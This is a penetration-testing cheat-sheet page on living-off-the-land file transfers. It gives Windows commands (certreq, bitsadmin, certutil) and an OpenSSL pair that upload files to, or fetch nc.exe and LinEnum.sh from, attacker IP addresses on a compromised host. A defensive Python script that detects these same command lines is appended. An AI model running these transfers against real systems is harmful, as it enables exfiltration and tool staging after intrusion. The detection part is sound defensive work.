
# LOTL

Use this page for living-off-the-land file transfers with built-in OS tools.

These methods avoid extra binaries and lean on what the OS already provides.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the machine you already accessed.
{% endhint %}

### What is living off the land

Instead of uploading your own tooling, use binaries that already exist on the system.

On Windows, these are often called LOLBins.

Good references:

* **LOLBAS** — Windows binaries at `lolbas-project.github.io`
* **GTFOBins** — Linux binaries at `gtfobins.github.io`

Search for `download` or `upload` patterns when you need a native transfer path.

### Windows LOLBins

#### 1. `CertReq.exe` — upload

`CertReq.exe` normally handles certificate requests.

You can also abuse it to `POST` a file to a listener.

**Attacker — listen with Netcat**

```bash
sudo nc -lvnp 8000
```

**Compromised host — send the file with `certreq.exe`**

```cmd
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
```

The file contents arrive in the Netcat session on the attacker.

#### 2. `Bitsadmin` — download

`Bitsadmin` usually downloads Windows updates in the background.

It can also download any file from the attacker.

**Compromised host — download with `bitsadmin`**

```cmd
:: CMD
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
```

```powershell
# PowerShell version
Import-Module bitstransfer
Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

#### 3. `Certutil` — download

`Certutil` is built into Windows.

It is heavily monitored and often flagged, so use it with care.

**Compromised host — download with `certutil`**

```cmd
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
```

### Linux LOLBins

#### `OpenSSL` — encrypted file transfer

OpenSSL is installed on most Linux systems.

It can behave like Netcat with encryption built in.

**Attacker — create a certificate and serve the file**

```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
```

**Compromised host — connect and receive the file**

```bash
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
```

`s_server` runs the SSL server.

`s_client` connects and receives the file.

`-quiet` suppresses handshake noise.

Compared to plain Netcat, the traffic is encrypted in transit.
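The same command-line shapes that make these transfers work are what a defender keys on. The script below is an added example (not part of the original page) that turns the Windows LOLBin commands above (`certreq -Post`, `bitsadmin /transfer`, `Start-BitsTransfer`, `certutil -verifyctl -split`) and the OpenSSL `s_client -connect` receive step into simple detection rules and runs them over a handful of constructed process-creation events. The event field names (`Image`, `CommandLine`) follow Sysmon Event ID 1 conventions; the sample events, rule names and severities are my own assumptions, not anything the page or a vendor defines.

```python
"""Flag process command lines matching the LOTL transfer patterns on this page.

All events below are constructed for illustration; field names mimic Sysmon
Event ID 1 (Image, CommandLine) but nothing here is a real log.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    process: str          # executable basename, lowercase, without .exe
    pattern: re.Pattern   # matched against the full command line
    severity: str


# Patterns mirror the commands shown on this page (assumed rule names).
RULES = [
    Rule("certreq_post_upload", "certreq",
         re.compile(r"-post\b.*-config\s+https?://", re.I), "medium"),
    Rule("bitsadmin_transfer", "bitsadmin",
         re.compile(r"/transfer\b.*https?://", re.I), "medium"),
    Rule("start_bitstransfer", "powershell",
         re.compile(r"start-bitstransfer\b.*-source\s+\S*https?://", re.I), "medium"),
    Rule("certutil_split_download", "certutil",
         re.compile(r"-verifyctl\b.*-split\b.*https?://", re.I), "high"),
    # s_client is also used for legitimate TLS debugging, so this one is weak
    # on its own and is best correlated with the destination port and user.
    Rule("openssl_sclient_receive", "openssl",
         re.compile(r"\bs_client\b.*-connect\s+\S+", re.I), "low"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
CONNECT_RE = re.compile(r"-connect\s+(\S+)", re.I)


def image_basename(image: str) -> str:
    """Lowercase executable name without directory or .exe suffix."""
    base = re.split(r"[\\/]", image)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def matching_rules(event: dict) -> list:
    """Return every Rule whose process and pattern both match this event."""
    base = image_basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [r for r in RULES if r.process == base and r.pattern.search(cmd)]


def extract_remote(cmd: str):
    """Pull the remote endpoint (URL or host:port) out of a command line for triage."""
    m = URL_RE.search(cmd)
    if m:
        return m.group(0)
    m = CONNECT_RE.search(cmd)
    return m.group(1) if m else None


def scan(events: list) -> list:
    """Run all rules over a list of events and return one finding per hit."""
    findings = []
    for ev in events:
        for rule in matching_rules(ev):
            findings.append({
                "rule": rule.name,
                "severity": rule.severity,
                "remote": extract_remote(ev.get("CommandLine", "")),
                "command": ev.get("CommandLine", ""),
            })
    return findings


# Constructed sample events: the five transfer commands from this page plus
# two benign uses of the same binaries that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c \"Start-BitsTransfer -Source 'http://10.10.10.32:8000/nc.exe' -Destination 'C:\Windows\Temp\nc.exe'\""},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe"},
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -connect 10.10.10.32:80 -quiet"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -dump C:\certs\ca.cer"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['remote']}")
```

These rules only work where command lines are actually recorded (Sysmon or Windows 4688 with command-line auditing enabled, auditd `execve` on Linux); the shell redirect in `openssl s_client ... > LinEnum.sh` never reaches the process arguments, which is why that rule matches on `-connect` alone and is rated low.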
